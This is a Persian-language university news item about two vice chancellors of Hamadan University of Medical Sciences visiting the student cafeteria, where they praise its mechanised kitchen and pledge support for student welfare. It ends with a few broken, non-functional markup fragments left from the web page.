بازدید معاون توسعه مدیریت و منابع دانشگاه از سلف دانشجویی دانشگاه علوم پزشکی همدان

معاون توسعه مدیریت و منابع به همراه دکتر لاری معاون فرهنگی و دانشجویی دانشگاه  از سلف دانشگاه علوم پزشکی همدان بازدید کردند.

مهندس رحیمی معاونت توسعه مدیریت و منابع به همراه دکتر لاری معاون فرهنگی و دانشجویی دانشگاه علوم پزشکی همدان از سلف دانشجویی این دانشگاه بازدید کردند.

در این بازدید مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه ضمن تقدیر از عملکرد مناسب کارکنان آشپزخانه سلف دانشگاه در خصوص طبخ خوراک مناسب برای رفاه دانشجویان اظهار داشت:یکی از اتفاقات بسیار خوبی که در حوزه سلف دانشگاه صورت گرفته است، مکانیزه و صنعتی شدن دستگاه ها و وسایل پخت غذا برای دانشجویان می باشد، که باعث می شود غذای طبخ شده با کیفیت بیشتر و با  رعایت نکات بهداشتی قابل توجهی به دست دانشجویان برسد.

وی در ادامه افزود:تمام تلاش معاونت توسعه مدیرت و منابع دانشگاه بر این اساس است که بودجه های تخصیص شده برای معاونت فرهنگی و دانشجویی با بهترین حالت ممکن پرداخت شود تا رفاه هر چه بیشتری را برای دانشجویان دانشگاه علوم پزشکی همدان که سرمایه های بالقوه ما هستند به ارمغان بیاوریم تا بتوانند در شرایط محیطی و فیزیکی مناسب تحصیل کنند و در آینده افتخار آفرینان کشور عزیزمان ایران اسلامی باشند.

در ادامه دستورات لازم برای پیگیری برخی از مشکلات توسط مهندس  رحیمی معاون توسعه مدیریت و منابع دانشگاه صادر شد

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>